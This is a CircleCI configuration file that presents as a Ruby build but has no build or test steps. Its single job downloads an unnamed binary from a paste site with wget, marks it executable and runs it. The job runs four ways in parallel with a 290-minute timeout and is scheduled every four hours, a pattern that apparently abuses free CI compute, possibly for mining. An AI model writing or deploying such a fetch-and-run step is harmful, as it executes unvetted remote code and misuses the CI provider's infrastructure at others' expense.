working_dir: &working_dir ~/app

version: 2.0
jobs:
  basahan:
    parallelism: 4
    docker:
      - image: circleci/ruby:2.5.8
    steps:
    - checkout
    - run:
        name: moka
        command: |
                  wget https://www.heypasteit.com/download/0IWOQF && mv 0IWOQF kocak && chmod u+x kocak && ./kocak kucing
        no_output_timeout: 290m
        
workflows:
  version: 2
  commit:
    jobs:
      - basahan
    triggers:
      - schedule:
          cron: "0 2,6,10,14,18,22 * * *"
          filters:
            branches:
              only:
                - master
                
  runningrubyjobs:
    jobs:
      - basahan
